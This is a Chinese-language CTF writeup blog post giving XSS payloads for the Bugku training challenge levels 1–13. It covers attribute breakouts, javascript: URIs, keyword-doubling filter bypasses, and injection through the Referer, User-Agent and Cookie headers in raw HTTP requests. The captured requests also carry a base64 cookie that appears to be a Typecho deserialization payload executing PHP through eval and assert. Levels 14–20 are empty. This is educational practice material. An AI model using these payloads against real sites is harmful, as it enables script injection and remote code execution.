

sky's blog

XSS挑战之旅-bugku

sky's blog

XSS挑战之旅-bugku

web writeup

字数统计: 490阅读时长: 3 min

 2017/09/08  Share

• 
• 
• 
• 
• 

前记

题目网址:http://120.24.86.145:8002/test/
做题浏览器:火狐

level-1

payload:

<script>alert(1)</script>

level-2

payload:

"><script>alert(1)</script>

level-3

payload:

' onmouseover='alert(1)

level-4

payload:

" onmouseover="alert(1)

level-5

payload:

"><a href="javascript:alert(1)">aa</a>//

level-6

payload:

"><a Href="javascript:alert(1)">aa</a>//

level-7

payload:

"><a Hrhrefef="javascscriptript:alert(1)">aa</a>//

level-8

payload:

javascript:
alert(1)

level-9

payload:

javascript:alert('http://')

level-10

payload:

http://120.24.86.145:8002/test/level10.php?keyword=well done!&t_sort=8888" 
type="text" onmouseover="alert(666)

level-11

攻击点在Referer，同样的payload
payload

GET /test/level11.php?keyword=11111 HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 8888" type="text" onmouseover="alert(666)
Accept-Language: zh-CN,zh;q=0.8
Cookie: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close

level-12

攻击点在UA，同样的payload
payload:

GET /test/level12.php?keyword=good%20job! HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: 8888" type="text" onmouseover="alert(666)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://120.24.86.145:8002/test/level11.php?keyword=11111
Accept-Language: zh-CN,zh;q=0.8
Cookie: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close

level-13

攻击点在cookie，同样的payload
payload:

GET /test/level13.php?keyword=good%20job! HTTP/1.1
Host: 120.24.86.145:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://120.24.86.145:8002/test/level12.php?keyword=good%20job!
Accept-Language: zh-CN,zh;q=0.8
Cookie: user=8888" type="text" onmouseover="alert(666); __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyNToiZXZhbCgncGhwaW5mbygpO2V4aXQoKTsnKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NToiYzF0YXMiO30=
Connection: close

level-14

level-15

level-16

level-17

level-18

level-19

level-20

点击赞赏二维码，您的支持将鼓励我继续创作！

• Next Post
  安恒秋季测试赛web部分wp
• Previous Post
  过气的00截断

Powered by Hexotheme Archer

CATALOG

1. 1. 前记
2. 2. level-1
3. 3. level-2
4. 4. level-3
5. 5. level-4
6. 6. level-5
7. 7. level-6
8. 8. level-7
9. 9. level-8
10. 10. level-9
11. 11. level-10
12. 12. level-11
13. 13. level-12
14. 14. level-13
15. 15. level-14
16. 16. level-15
17. 17. level-16
18. 18. level-17
19. 19. level-18
20. 20. level-19
21. 21. level-20



• Archive
• Tag
• Cate

Total : 225

2020

• 08/232020 第四届强网杯全国网络安全挑战赛Online Writeup
• 08/202020 全国大学生信息安全竞赛Online Web题解
• 08/11Paper Summary & ABSynthe & Automatic Blackbox Side-channel Synthesis onCommodity Microarchitectures
• 08/012020 WMCTF Online Web Writeup
• 07/252020 Cybrics CTF Web Writeup
• 07/22Laravel 5 Deserialization Chain Summary
• 07/19Laravel 7 Deserialization Chain Summary
• 06/272020 TCTF Online Web WriteUp
• 06/242020 第五空间 Web Writeup
• 06/22CVE-2019-10795 & undefsafe Prototype Pollution Vulnerability
• 06/12Web缓存利用分析(三)
• 06/12Web缓存利用分析(二)
• 05/29Paper Summary & Deemon & Detecting CSRF with Dynamic Analysis and Property Graphs
• 05/14Web缓存利用分析(一)
• 05/05Paper Summary & NAVEX-Precise and Scalable Exploit Generation for Dynamic Web Applications
• 05/032020 De1CTF & Animal Crossing
• 04/29Paper Summary & FUSE & Finding File Upload Bugs via Penetration Testing
• 02/092020 CodeGate Web Writeup
• 01/14Paper Summary & Webshell Detection Based on Random Forest–Gradient Boosting Decision Tree Algorithm
• 01/13Paper Summary & Evaluating CNN and LSTM for Web Attack Detection
• 01/13Paper Summary & Detecting Webshell Based on Random Forest with FastText
• 01/09Paper Summary & CNN-Webshell & Malicious Web Shell Detection with Convolutional Neural Network
• 01/09Paper Summary & Peeves ：Physical Event Verification in Smart Homes

2019

• 12/132019 FudanCTF Writeup
• 12/07Paper Summary & LEMNA & Explaining Deep Learning based Security Applications
• 12/062019 SWPU CTF Web Writeup
• 12/06Paper Summary & Prototype pollution attack in NodeJS application
• 12/032019 TMCTF Final & Hack Server
• 10/192019 巅峰极客 Online WriteUp
• 09/282019 OGeek Final & Java Web
• 09/272019 Trend Micro CTF & Java Web
• 08/152019网络与信息安全领域专项赛Web Writeup
• 08/032019 De1CTF Writeup
• 08/02phpggc详解
• 07/22CVE-2019-9081:Laravel Deserialization RCE Vulnerability
• 07/22CyBRICS CTF Quals 2019 Web Writeup
• 07/18Summary of serialization attacks Part 3
• 07/122019 0ctf final Web Writeup（2）
• 07/092019 WCTF & P-door
• 07/042019 神盾杯 final Writeup（2）
• 07/032019 神盾杯 final Writeup（1）
• 06/162019 强网杯final Web Writeup
• 06/102019 0ctf final Web Writeup（1）
• 05/252019 强网杯online Web Writeup
• 05/182019 RCTF Web Writeup
• 05/05Summary of serialization attacks & Part 2
• 05/05Summary of serialization attacks & Part 1
• 04/252019西湖论剑AD攻防Web题解
• 04/12从PHP底层看open_basedir bypass
• 04/08Some Trick About LFI
• 03/292019 Pwnhub-Always be with U-Writeup
• 03/29PHP Parametric Function RCE
• 03/252019 0CTF Web WriteUp
• 03/102018 Code Breaking(1) & function
• 03/102018 Code Breaking(2) & pcrewaf
• 03/102018 Code Breaking(3) & phplimit
• 03/102018 Code Breaking(4) & phpmagic
• 02/25从一道题看imap_open() rce
• 02/242019 安恒杯 2月月赛 Writeup
• 02/21浅谈RSA公钥非素数问题
• 02/192019 Hgame Week4 Crypto&Sign_in_SemiHard
• 02/182019 Hgame Web Week4 Writeup
• 02/102019 Hgame Web&Crypto Week3 Writeup
• 02/052019 Hgame Web Week2 Writeup
• 01/252019 Hgame Web Week1
• 01/252019 安恒杯 1月月赛 Writeup
• 01/22JavaScript侧信道时间测量

2018

• 12/24Cross-Browser-Tracking-Summary-Part-4
• 12/21Cross-Browser-Tracking-Summary-Part-3
• 12/20Cross Browser Tracking Summary Part-2
• 12/172018 SWPUCTF Web
• 12/15Cross Browser Tracking Summary Part-1
• 11/242018 安恒杯 11月月赛writeup
• 11/17当中国剩余定理邂逅RSA
• 11/172018 Xctf Final LCTF-Bestphp
• 11/162018 EIS web
• 11/122018 HCTF Web Writeup
• 11/12Artificial Intelligence Review
• 11/042018 上海大学生信息安全竞赛 web
• 10/29Symmetric block ciphers Summary - DES & AES
• 10/132018 护网杯 web writeup
• 09/242018安恒杯 9月月赛Writeup
• 09/172018-noxCTF-Crypto-RSA
• 09/17Crypto-RSA-公钥攻击小结
• 09/15浅析RSA Padding Attack
• 09/13Crypto-RSA多等式攻击总结
• 09/10Pwnhub-Crypto-韩国欧巴
• 08/252018 安恒8月赛 Writeup
• 08/25RSA之拒绝套路(2)
• 08/24Crypto之击破多层加密
• 08/24RSA之拒绝套路(1)
• 08/23从一道Crypto题目认识z3
• 08/202018 WhiteHat writeup
• 08/18浅析xml之xinclude & xslt
• 08/17SOAP及相关漏洞研究
• 08/17php函数默认配置引发的安全问题
• 08/172018 RealWorld Web Writeup
• 08/17xss->ssrf->redis
• 08/17浅析xml及其安全问题
• 08/16一道CTF题引发的思考-sql注入
• 08/16Upload-labs&Upload Bypass Summarize
• 08/16inndy-crypto-writeup
• 08/15从一道CTF题引发的思考
• 07/302018 ISITDTU CTF-Web
• 07/262018 MeePwn-Web-复现
• 07/232018 巅峰极客-Web补题
• 07/18东南-复旦保研经历及感想
• 07/14软件安全复习总结
• 07/13网络管理复习
• 06/29安全协议考试重点
• 06/20DC0531-web
• 06/13保研机试C++算法复习
• 06/05Network Management Review
• 06/04Secure Protocol Review
• 06/032018.6.1 信息安全铁人三项赛数据赛题解
• 05/312018.5.18 信息安全铁人三项赛数据赛题解
• 05/302018.5.5 信息安全铁人三项赛数据赛题解
• 05/272018RedHat-AD-Web
• 05/19Json Web Token历险记
• 05/192018CUMTCTF-Final-Web
• 05/122018年第四届全国网络空间安全技术大赛
• 05/012018-RedHat-Web_Misc
• 04/27线下AD&代码审计&ECShop V2.7.3
• 04/222018 DDCTF-bitcoin-51%Attack
• 04/21数据分析-企业渗透过程
• 04/21流量分析-CTF题目实战
• 04/162018-XCTF-HITB-PhpLover
• 04/15Long-Ago-AWD-Flasky
• 04/132018-XCTF-HITB-WEB
• 04/112018 0ctf-ezdoor
• 04/092018 0ctf-login me
• 04/042018 pwnhub time injection带来的新思路
• 04/04amazing phpinfo()
• 04/01Python is the best language
• 03/23从sql注入到xslt再到xxe的一道ctf题目
• 03/21从一道题深入mysql字符集与比对方法collation
• 03/15solveme.peng.kr-web
• 03/15Some trick in ssrf and unserialize()
• 03/12N1CTF 2018-Web
• 03/09php-command/code-injection summary
• 03/052018安全客元宵节小礼品趣味题
• 02/27RingZer0-web-sql系列记录
• 02/272018安恒杯2月月赛web题解
• 02/25hgame-week4-web
• 02/21week3-hgame之web粗略记录
• 02/13happymoctf之web全题解
• 02/02skysql之union绕waf
• 02/01HITCTF-WEB题解
• 01/31moctf-Web题解
• 01/27最近复现的几个CVE题目
• 01/27有点意思的3道web题
• 01/222018 安恒一月月赛部分题解
• 01/182018 XCTF-赛博地球杯工业互联网安全大赛web部分题解
• 01/07hackme网站边做边记录

2017

• 12/29Time_Based_RCE
• 12/29cms小白审计-typecho反序列漏洞
• 12/25一道有关密钥编排的DES题目
• 12/24密码学课程设计之二手撸AES加解密程序
• 12/24密码学课程设计一之维吉尼亚唯密文破解
• 12/24密码学课程设计二之手撸DES加解密程序
• 12/192017 安恒12月赛之VSCMS审计
• 12/172017 安恒杯-12月月赛
• 12/15parse_url函数小记
• 12/142017 pwnhub成功就是要梭哈之学习记录
• 12/13密码学课程3道古典密码题目
• 12/13padding oracle和cbc翻转攻击
• 12/112017.12.11学习笔记
• 12/11Jarvis-OJ-Crypto
• 11/27算法上机题复习
• 11/272017 湖湘杯复赛web400
• 11/252017 湖湘杯复赛web题解
• 11/19近期做的其他平台的3道注入题
• 11/18第三届上海AWD线下赛感悟
• 11/12MCTF-flappybird题解
• 11/122017 hctf的3道web题题解
• 11/052017 上海赛的RSA研究
• 11/052017 上海线上赛web题解
• 10/302017 XDCTF线下赛经历及感悟
• 10/292017 安恒总决赛的一道代码审计
• 10/282017 geekgame部分web题解
• 10/27江苏第六届省赛线下AWD感触
• 10/232017 BDCTF第一轮初赛web题解
• 10/22ss和kali源遇到的bug记录
• 10/22安恒秋季线下赛决赛wp
• 10/15安恒杯Web安全测试赛秋季赛部分wp
• 10/12安恒秋季测试赛web部分wp
• 09/08XSS挑战之旅-bugku
• 09/06过气的00截断
• 09/06有趣的.htaccess
• 08/28sql注入—into outfile、load_file()
• 08/212017 Xman线下赛源码审计
• 08/19SSRF学习
• 08/18xml注入攻击学习
• 08/18密码学自学
• 08/17Hexo报错，DEP0061
• 08/16jarvisoj-web
• 07/25RSA常用工具
• 07/25github博客之page build failed
• 07/24docker基础学习
• 07/23SQLi-LABS(Challenges)(Less-54 ~ Less-65)
• 07/23SQLi-LABS(Stacked)(Less-39 ~ Less-53)
• 07/22PHP函数黑魔法小总结
• 07/20SQLi-LABS(Adv)(Less-23 ~ Less-38)
• 07/19sql注入的一些技巧原理
• 07/18SQLi-LABS(Basic)(Less-1 ~ Less-22)
• 07/18flask的excel导入与导出
• 07/12.git学习-边学边记录
• 07/11sniperoj-web
• 07/10曼切斯特与差分曼切斯特
• 06/28马原闲聊
• 06/28openctf-writeup
• 06/26记一次蛇皮的微机实验考试
• 06/24计网复习总结
• 06/22闲着无聊随便写的微机代码
• 06/21微机实验考试代码
• 06/21RSA算法研究
• 06/20GCTF的一道php反序列化题目
• 06/19CRC32爆破总结
• 06/18陕西杯web详解
• 06/18微机实验代码
• 06/16CBC字节翻转攻击
• 06/16Bugku-writeup
• 06/16CUMTCTF-初赛
• 06/16椭圆加密算法ECC
• 05/172017-CUMTCTF-Final

web writeup crypto misc others cve paper ml IOT



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

web writeup crypto misc others paper

